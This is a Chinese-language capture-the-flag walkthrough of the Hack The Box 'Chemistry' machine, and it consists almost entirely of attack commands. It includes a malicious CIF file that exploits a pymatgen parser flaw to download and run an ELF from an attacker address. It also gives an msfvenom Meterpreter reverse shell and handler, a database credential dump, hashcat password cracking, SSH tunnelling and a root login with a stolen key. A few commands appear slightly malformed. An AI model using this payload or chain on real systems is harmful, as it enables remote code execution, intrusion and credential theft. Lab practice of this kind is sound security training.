知识点:命令执行漏洞、本地文件包含
nmap -sC -sV -O -oN nmap.txt 10.10.11.38
CIF文件导致命令执行
https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("wget 10.10.16.9/sss.elf && chmod +x sss.elf && ./sss.elf");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.10.16.9 lport=4446 -f elf>sss.elf
python -m http.server 80
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 10.10.16.9
set lport 4446
run
sqlite3 /home/app/instance/database.db
.table
select * from user;
hashcat -m 0 rosa.hash rockyou –show
ssh rosa@10.10.11.38
netstat -tuln
ssh rosa@10.10.11.38 -L 8080:localhost:8080
chmod root_id_rsa
ssh -I root_id_rsa root@10.10.11.38
原文始发于微信公众号(Rsec):HTB靶场 Chemistry (Linux)[Easy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论